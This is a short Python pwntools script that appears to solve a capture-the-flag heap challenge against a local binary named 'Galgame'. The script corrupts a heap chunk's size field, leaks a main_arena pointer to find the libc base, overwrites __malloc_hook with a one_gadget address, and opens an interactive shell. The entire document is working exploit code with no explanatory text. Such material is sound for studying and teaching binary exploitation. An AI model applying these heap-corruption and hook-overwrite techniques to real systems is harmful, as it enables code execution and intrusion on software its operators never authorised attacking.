from pwn import *
#context.log_level = 'debug'

p = process('./Galgame')
e = ELF('./Galgame')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def send_gift():
    p.sendlineafter('>> ','1')

def invite(index,name):
    p.sendlineafter('>> ','2')
    p.sendlineafter('idx >> ',str(index))
    p.sendafter('movie name >> ',name)

def confess():
    p.sendlineafter('>> ','3')

def collection():
    p.sendlineafter('>> ','4')

def bye(content):
    p.sendlineafter('>> ','5')
    p.sendafter("Hotaru: Won't you stay with me for a while? QAQ",content)

#gdb.attach(p,'b *0x40129B')
#x /16xg 0x404060
#x /16xg 0x404098

send_gift()
invite(0,b'a'*0x8+p64(0xf91))
confess()
send_gift()
collection()

p.recvuntil('1: ')
main_arena_addr = u64(p.recvn(6).ljust(8,b'\x00')) - 1640
libc_offset = main_arena_addr - 0x10 - libc.symbols['__malloc_hook']
one_gadget = 0xf1247 + libc_offset
print(hex(main_arena_addr))

bye(p64(main_arena_addr-0x10-0x60))#__malloc_hook
invite(8,p64(one_gadget)+p64(0))
send_gift()

p.interactive()